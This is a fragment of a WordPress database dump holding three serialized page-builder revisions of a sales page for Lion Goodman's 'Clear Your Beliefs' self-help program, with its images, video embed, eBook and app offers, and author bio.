(1023, 1525, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2749:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:567:"<div id="divStroke">\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1025, 1527, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:568:"<div id="divStroke2">\n<center>\n<p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 45px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p>\n</center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1026, 1528, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:557:"<div id="divStroke2"><center><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p style="margin-left: 45px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p><p> </p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
